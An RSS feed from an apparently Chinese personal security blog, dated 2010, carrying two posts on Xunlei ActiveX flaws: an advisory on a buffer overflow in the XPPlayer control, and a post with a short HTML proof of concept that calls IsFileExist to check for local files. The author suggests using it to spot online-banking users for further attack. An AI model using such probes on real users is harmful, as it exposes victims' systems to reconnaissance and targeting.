<?xml version="1.0" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>hbs' blog - {网络安全}</title><link>http://www.hb4.org/</link><description>fuck by fuck! - </description><generator>RainbowSoft Studio Z-Blog 1.8 Walle Build 100427</generator><language>zh-CN</language><copyright>Copyright 2007-2010 Your WebSite. Some Rights Reserved.</copyright><pubDate>Tue, 07 Sep 2010 07:42:27 +0800</pubDate><item><title>迅雷5 XPPlayer Activex控件远程代码执行0day漏洞</title><author>a@b.com (hbslover)</author><link>http://www.hb4.org/Article/17.htm</link><pubDate>Tue, 05 Jan 2010 19:56:55 +0800</pubDate><guid>http://www.hb4.org/Article/17.htm</guid><description><![CDATA[<div class="post-hr">影响版本:</div><div class="post-content"><pre>Xunlei5.9.14.1246以下所有版本</pre></div><div class="post-hr">漏洞描述:</div><div class="post-content">Xunlei 是一款在线加速下载程序。更多详细信息请参考：<a href="http://www.xunlei.com{F3E70CEA-956E-49CC-B444-73AFE593AD7F}Xunlei">http://www.xunlei.com{F3E70CEA-956E-49CC-B444-73AFE593AD7F}Xunlei</a> 提供的XPPlayer ActiveX控件存在缓冲区溢出，远程攻击者可以利用漏洞以应用程序权限执行任意指令。问题存在于DapFileSize，VodUrl等方法处理中，由于对参数缺少充分过滤，构建恶意WEB页，诱使用户访问，可导致以应用程序权限执行任意指令。</div><div><span class="post-vuln"><strong>&lt;*参考</strong></span> <blockquote>superli@Safe-mail.net</blockquote><span class="post-vuln"><strong>*&gt;</strong></span></div>]]></description><category>{网络安全}</category><comments>http://www.hb4.org/Article/17.htm#comment</comments><wfw:comment>http://www.hb4.org/</wfw:comment><wfw:commentRss>http://www.hb4.org/feed.asp?cmt=17</wfw:commentRss><trackback:ping>http://www.hb4.org/cmd.asp?act=tb&amp;id=17&amp;key=d6d67a47</trackback:ping></item><item><title>迅雷看看的漏洞能帮我们干些什么???</title><author>a@b.com (hbslover)</author><link>http://www.hb4.org/Article/xunlei_kankan_bug.htm</link><pubDate>Mon, 16 Nov 2009 19:58:56 +0800</pubDate><guid>http://www.hb4.org/Article/xunlei_kankan_bug.htm</guid><description><![CDATA[<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;迅雷看看除了能给我们看电影之外?还能给我们干点别的什么邪恶的事情呢???</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 当然,这个漏洞的危害不大,不过泄漏你一点信息而已,前提是你安装了迅雷看看~漏洞是出现在ActiveX控件的一个函数上</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 并没有判断调用者是谁,就胡乱的去执行相关的函数:.IsFileExist（文件名）,返回值为0或1~~~</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;html&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;body&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;object classid=&quot;clsid:ACACC6EB-1FBA-4E13-A729-53AEB2DF54F8&quot; id=&quot;target&quot;&gt;&lt;/object&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;input onclick=&quot;on()&quot; type=&quot;button&quot; value=&quot;test&quot;/&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;script language=&quot;javascript&quot;&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;function on()<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;alert(target.IsFileExist(&quot;c:\\boot.ini&quot;))<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/script&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/body&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/html&gt;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 上面是测试的html,我今天测试了一下,确实有效.(测试代码来自sebug).</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 当然,想想,这个漏洞的危害不是那么的大,但是全国装迅雷看看的用户不再少数.</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 那么全国装了迅雷看看,又同时使用网银的网友也不会再少数,当然,我就是这样</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 这种方式只能判断某些人是网银用户,如果配合上一些比较邪恶的东西呢???那么效率会不会高点???</p>]]></description><category>{网络安全}</category><comments>http://www.hb4.org/Article/xunlei_kankan_bug.htm#comment</comments><wfw:comment>http://www.hb4.org/</wfw:comment><wfw:commentRss>http://www.hb4.org/feed.asp?cmt=9</wfw:commentRss><trackback:ping>http://www.hb4.org/cmd.asp?act=tb&amp;id=9&amp;key=3c5df39c</trackback:ping></item></channel></rss>
